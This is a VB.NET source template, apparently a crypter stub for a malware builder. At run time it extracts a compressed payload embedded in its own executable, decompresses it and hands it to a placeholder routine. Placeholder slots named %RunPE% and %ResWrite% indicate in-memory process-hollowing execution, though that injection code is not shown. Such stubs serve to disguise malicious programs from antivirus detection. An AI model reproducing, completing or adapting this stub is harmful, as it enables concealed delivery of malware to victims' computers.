Imports System, System.Windows.Forms, System.Diagnostics, System.Text, Microsoft.VisualBasic, System.IO, System.IO.Compression, System.Collections.Generic, System.Runtime.InteropServices 

Module Module1
    Sub main()
        Dim ebytes() As Byte
        Dim dbytes() As Byte
        ebytes = %namefuncRes%(Application.ExecutablePath)
        dbytes = Compression.Decompress(ebytes)
        Dim x As New %nameclass% : x.%namefunc%((dbytes), Application.ExecutablePath)
    End Sub
End Module
%RunPE%
%ResWrite%
Public Class Compression
    Public Shared Function Decompress(ByVal bytData() As Byte) As Byte()
        Using oMS As New MemoryStream(bytData)
            Using oGZipStream As New GZipStream(oMS, CompressionMode.Decompress)
                Const CHUNK As Integer = 1024
                Dim intTotalBytesRead As Integer = 0
                Do
                    ' Enlarge the buffer.
                    ReDim Preserve bytData(intTotalBytesRead + CHUNK - 1)
                    ' Read the next chunk.
                    Dim intBytesRead As Integer = oGZipStream.Read(bytData, intTotalBytesRead, CHUNK)
                    intTotalBytesRead += intBytesRead
                    ' See if we're done.
                    If intBytesRead < CHUNK Then
                        ' We're done. Make the buffer fit the data.
                        ReDim Preserve bytData(intTotalBytesRead - 1)
                        Exit Do
                    End If
                Loop
                oGZipStream.Close()
            End Using
            oMS.Close()
        End Using
        Return bytData
    End Function
End Class